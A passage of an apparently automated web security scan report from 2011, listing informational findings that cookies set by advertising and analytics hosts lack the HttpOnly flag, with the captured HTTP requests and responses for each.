e$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$'/1!!!!#<wx=%!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 23:44:13 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://ib.adnxs.com/seg?add=115983&t=2
Cache-Control: no-store
Last-Modified: Mon, 25 Apr 2011 23:44:13 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


15.60. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303827675.212,wait-%3E10000,&1303827686144 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_G=method->-1,ts->1303827671; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:16 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303827675%2E212%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

15.61. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732015&AR_C=178113848 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:50 2011&prad=253732017&arc=194941023&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:11 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; expires=Mon 25-Jul-2011 14:21:11 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303827671; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732015",Pid:"p97174789",Arc:"178113848",Location:
...[SNIP]...

15.62. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1114821727&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.tenable.com%252Fservices%252Fnessus-perimeter-service%253Fgclid%253DCNLb8cPsuKgCFQbe4AodEirYCA%26jsref%3D%26rnd%3D1303775074503&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.tenable.com%2Fservices%2Fnessus-perimeter-service%3Fgclid%3DCNLb8cPsuKgCFQbe4AodEirYCA&jsref=&rnd=1303775074503
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 23:45:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.63. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69114&c5=166308&c6=&cv=1.3&cj=1&rn=1263260761 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 26 Apr 2011 14:21:10 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Thu, 25-Apr-2013 14:21:10 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

15.64. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732015&c4=178113848&c5=1&c6=24&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&c9=&c10=&c15=&1303827681934 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_G=method->-1,ts->1303827671; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 26 Apr 2011 14:21:16 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Thu, 25-Apr-2013 14:21:16 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.65. http://bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1303826034; domain=bing.com; path=/
Date: Tue, 26 Apr 2011 13:53:53 GMT


15.66. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2423626&PluID=0&w=300&h=250&ord=20110426142246&ifrm=2&ncu=http%3A%2F%2Fspamlaws.us.intellitxt.com%2Fal.asp%3Fts%3D20110426142113%26at%3D39%26ipid%3D10143%26di%3D31742909%26syid%3D0%26adid%3D0%26pid%3D2%26cc%3Dus%26rcc%3Dus%26mh%3Db5e073b8ec12fc1181fc2fd3b1a46a79%26ll%3D0%26hbll%3D0%26id%3DFCBEC610ABA64BC3BAF092D3EB42D7C0%26idh%3De18a41658ec9c9c740dc1b91edbc4646%26pvu%3D59196390591647FA9372FACB8C10DBA5%26pvm%3D35e167e1c66fee62be98fe397190a726%26uf%3D0%26ur%3D0%26llip%3D0%26ttv%3D1%26redir%3D HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000gY2paFS+09nl00003hH4jaFhv09wy00001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWg07aw00001jeoLaF6J07Hs00001j8QYaEBz07LU00001hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001; B3=7.Wt0000000001ui8Dka0000000001uh9cTR0000000001uf52BU0000000001ui9abz0000000000ui9eB50000000001uj8TfJ0000000001uh93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; expires=Mon, 25-Jul-2011 10:22:37 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 14:22:37 GMT
Connection: close
Content-Length: 3235

<HTML><Body><Script>/*1*/var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=e
...[SNIP]...

15.67. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Sat, 12-Nov-2011 13:54:00 GMT; path=/;
Date: Tue, 26 Apr 2011 13:53:59 GMT
Content-Length: 0


15.68. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4db6076013a27c7a&callback=_ate.ad.hrr&pub=xa-4ca0241930358767&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fresources%2Fwebinars%2Fe-commerce%2Fpci-compliance-demystified.php%3Fgclid%3DCMO8iMjsuKgCFQ5-5Qodm1pYEg&9vmo63 HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%7D..1303662902.1FE|1303662902.1OD|1303662902.60; dt=X; psc=3; uid=4dab4fa85facd099; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 25 Apr 2011 23:45:19 GMT
Set-Cookie: di=1303662902.60|1303662902.1OD|1303662902.1FE; Domain=.addthis.com; Expires=Wed, 24-Apr-2013 23:45:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 25-May-2011 23:45:19 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Mon, 25 Apr 2011 23:45:19 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

15.69. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.comodo.com%2fbusiness-security%2fpci-compliance%2fpci-scan.php HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0e3la00837010i02408; rdrlst=40415xylk60qe00000002370113bolk7p6z0000000137010znmlk346200000003370110poljyxb4000000053701; sglst=2020s0t7ljyxb408rvv00537010i02405ag3ljyxb408rvv00537010i02405; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0etq900937020i03409; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40515xylk60qe00000003370213bolk7p6z0000000237020znmlk346200000004370210poljyxb4000000063702159olk8fby000000013701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb409i0u00637020i03406ag3ljyxb409i0u00637020i03406; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Set-Cookie: vstcnt=417k010r024uzg6118e10024eflo118e1042; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 23:45:34 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=CEGVCKfQuwIQi4DI6wM&guid=ON&script=0
Content-Length: 0
Date: Mon, 25 Apr 2011 23:45:33 GMT


15.70. http://ds.addthis.com/red/psi/sites/www.comodo.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.comodo.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.comodo.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.comodo.com%2Fbusiness-security%2Fpci-compliance%2Fpci-scan.php&scb19p HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303662902.60|1303662902.1OD|1303662902.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 347
Content-Type: text/javascript
